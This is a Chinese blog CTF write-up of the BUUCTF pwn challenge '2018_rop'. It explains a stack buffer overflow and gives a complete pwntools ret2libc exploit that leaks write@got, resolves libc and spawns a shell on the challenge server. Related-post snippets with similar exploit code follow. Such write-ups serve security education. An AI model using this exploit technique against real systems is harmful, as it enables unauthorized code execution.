buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp

最新推荐文章于 2024-01-08 12:52:27 发布
最新推荐文章于 2024-01-08 12:52:27 发布
阅读量684 收藏 1
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121234699
版权

1.检查保护机制

2.我们用32位的IDA打开该文件 

shift+f12查看关键字符串,没有发现关键字符串 

3.我们查看main函数里面的内容 

我们发现有两个函数

 进入第一个函数

进入第二个函数

 

在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 

4.system("/bin/sh")

我们在文件中没有找到可以拿到shellcode权限

所以我们要用libc,计算偏移量,拿到shellcode权限

base_addr     = puts_addr - libc_puts_addr

system_addr = base_addr + libc_system_addr

bin_addr        = base_addr + libc_bin_addr 

5.ROP链

4

write@got

1

main

write@plt

6.EXP

该题用了rop链和libc

#encoding = utf-8
from pwn import * 
from LibcSearcher import * 

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./2018_rop')

def main():
	if content == 1:
		p = process('2018_rop')
	else:
		p = remote('node4.buuoj.cn',25020)
	
	#elf
	main_addr      = elf.sym['main']
	plt_write_addr = elf.plt['write']
	got_write_addr = elf.got['write']
	payload        = b'a'*(0x88+0x4) + p32(plt_write_addr) + p32(main_addr) + p32(1) + p32(got_write_addr) + p32(4)
	p.sendline(payload)
	write_addr     = u32(p.recv(4))
	print(hex(write_addr))
	
	#libc
	lib             = LibcSearcher('write',write_addr)
	lib_write_addr  = lib.dump('write')
	lib_system_addr = lib.dump('system')
	lib_bin_addr    = lib.dump('str_bin_sh')
	
	#base
	base_addr       = write_addr - lib_write_addr
	system_addr     = base_addr  + lib_system_addr
	bin_addr 	= base_addr  + lib_bin_addr
	
	payload = b'a'*(0x88+0x4) + p32(system_addr) + b'aaaa' + p32(bin_addr)
	p.sendline(payload)
	 
	
	p.interactive()
main()

 

 

L__y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 349
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 514
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 222
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
铁人三项(第五赛区)_2018_rop
m0sway的博客
04-01 352
铁人三项(第五赛区)_2018_rop WriteUp BUU_PWN
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 420
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
餐桌上的猫
03-25 111
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/2018_rop') p=remote('node4.buuoj.cn',26218) main=0x80484C6 write_plt=elf.plt['write'] write_got=elf.got['write'] payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3
【CTF】 2018_rop
凉水的博客
06-17 460
2018_rop
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2342
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 973
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1183
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
信息安全铁人三项比赛答案
vspiders的博客
05-24 8992
一、    问题背景 黑客对一个网站管理系统进行了暴力破解,成功获取了管理权限,并下载了重要文件。 二、    问题分析 1,       黑客最终获得了什么用户名 根据问题背景,黑客对一个网站管理系统进行了暴力破解。那么预测是对网站进行密码的穷举破解,既通过不断地向网站发送POST登陆请求,不断尝试字典里的账号密码登陆直到找到正确的网站管理系统账号密码。因此在wireshark中使用过滤
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值